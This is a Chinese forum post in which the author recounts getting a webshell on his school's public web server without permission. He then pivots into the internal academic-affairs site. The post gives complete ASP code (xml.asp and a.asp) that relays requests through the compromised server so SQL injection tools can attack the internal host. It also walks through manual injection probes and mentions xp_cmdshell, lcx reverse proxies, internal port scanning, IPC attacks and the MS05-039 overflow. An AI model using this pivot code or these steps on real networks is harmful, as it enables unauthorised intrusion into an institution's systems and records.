转载请注明作者和出处
内网渗透碰到一些问题,不过又发现一点好玩的东西.
拿出来给大家看下,高手见笑了.
注:这个是我们学校,请大家不要破坏,谢谢.不然我就死了.:(
考试成绩出来了,查分只能在校园内网教务处的站查(http://jwc.***.edu.cnhttp://jwc.***.edu.cn/">http://jwc.***.edu.cn>),外网访问不了的.
郁闷,上机卡丢了,不想跑去学校机房,想突破下.
狗*运,竟然得到了www2.***.edu.cn的webshell
方法:注射,上传,溢出,别的我也不会了.
P颠P颠的登上去,WScript.Shell都没禁止,上天真是厚待我啊.
准备直接开个代理,内网渗透开始-_-|
顺手一个ipconfig,傻了.两个IP根本就不一样.
202.***.144.7
220.1**.195.134
http://3800hk.com/soft/UploadSoftPic/200512/0512231.jpg" border="0" />
简单分析下:
校园网有两条线,一个是本地的ISP分配给的公网IP,一个是教育网.
外部网络(本例为我)通过ISP访问学校网站,路由将80端口的数据转向给内部的一台主机HTTP服务.
现在的思路是利用lcx,再反弹出一个SOCK的代理服务.
但是这里老出问题,连上我的总是ISP的IP,还是不能访问内网.
郁闷到死,我演示一下的好.220.1**.195.129
换个思路.
ASP里面有个不错的函数,大家也用的很多,就是XMLHTTP,大家用的iget.vbs还有就是大家熟悉的ASP小偷程序都有应用.这也是前几天生成静态页面时想出来的.
代码:(xml.asp)
<%'容错处理
On Error Resume Next
%>
<%
Function getHTTPPage(url)
dim objXML
set objXML=server.createobject("MSXML2.XMLHTTP")'定义
objXML.open "GET",url,false'打开
objXML.send()'发送
If objXML.readystate<>4 then '判断文档是否已经解析完,以做客户端接受返回消息
exit function
End If
getHTTPPage=BytesToBstr(objXML.responseBody)'返回信息,同时用函数定义编码
set objXML=nothing'关闭
if err.number<>0 then err.Clear
End Function
Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
'转换原来默认的UTF-8编码转换成GB2312编码,否则直接用XMLHTTP调用有中文字符的网页得到的将是乱码
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
<%'生成HTML页面
Dim Url,Html
url=request("url")
if url<>"" then
Html = getHTTPPage(Url)
response.write Html
end if
%>
我们来实验一下,因为相对路径的问题,不能显示图片,和有的链接.(不知道相对路径的自己google)
看.返回了页面,一个ASP的系统哦.大家也都知道校园网的安全-_-!
来找下注射点,随便一个,注意相对路径.
and 1=1返回正确
and 1=2哈,出错了!
再来and 1=@@version;mailto:1=@@version">1=@@version; />有了工具后,我可不喜欢手工来,累死.
翠花,上工具,准备工作是我们要重新写下代码.
很简单将URL定死,只接受我们的构造语句.
-----------------a.asp---------------------------
url=request("id")
if url<>"" then
url="http://jw.***.edu.cn/sjyjwc/gzjb/gzjb.asp?id="&url
http://jw.***.edu.cn/sjyjwc/gzjb/gzjb.asp?id=">http://jw.***.edu.cn/sjyjwc/gzjb/gzjb.asp?id="&url
--------------------------------------------------
最后成格式成a.asp?id=1这样的,便于工具利用.
看我演示.其实只要有exec master..xp_cmdshell 'dir',直接执行程序.
就省下了很多事情,可惜我这里不行,只是给大家思路.汗~
其实我们不仅仅拿来注射内网,还可以拿来做代理扫描的.
只要将刚才的地址修改就可以了。再来演示一下。
我们看一下这时的连接,看到了本机访问肉鸡的IP,和肉鸡访问的本机的记录,两个IP不一样,难道内网机器通过代理上网?不大明白了。
-----------------------------------------------
9 60.0.*.5 80 220.1*4.1**.129 41524
10 60.0.*.5 1284 220.1*4.1**.134 80
到这里就该结束了,最后说下内网注射的缺点,在交互的页面,也就是说如果只能扫描出web管理员的用户名和密码,如何找出管理登陆的页面和如何登陆就是个大问题了。还在想……
有个折中的办法,如果我们得到内网的一台普通的机器,运气好的话,返回的是它的内网IP,这些问题就解决了。(没有测试环境,猜测中。)
lcx+sock我们就可以把自己也变成内网。现在是如何得到内网的IP?
有两种方法,主页挂马,得到内网用户的IP。不喜欢,这样我主页我就保不久了。
另外一种,自己扫描,没怎么找到命令行下的工具,nmap有点庞大,就自己写了一个在线的IP扫描器,修改angel的端口扫描器。
找到打开135,139的机器,试试IPC和MS05039溢出。
后面未验证,有什么错误,请大家指正,谢谢。
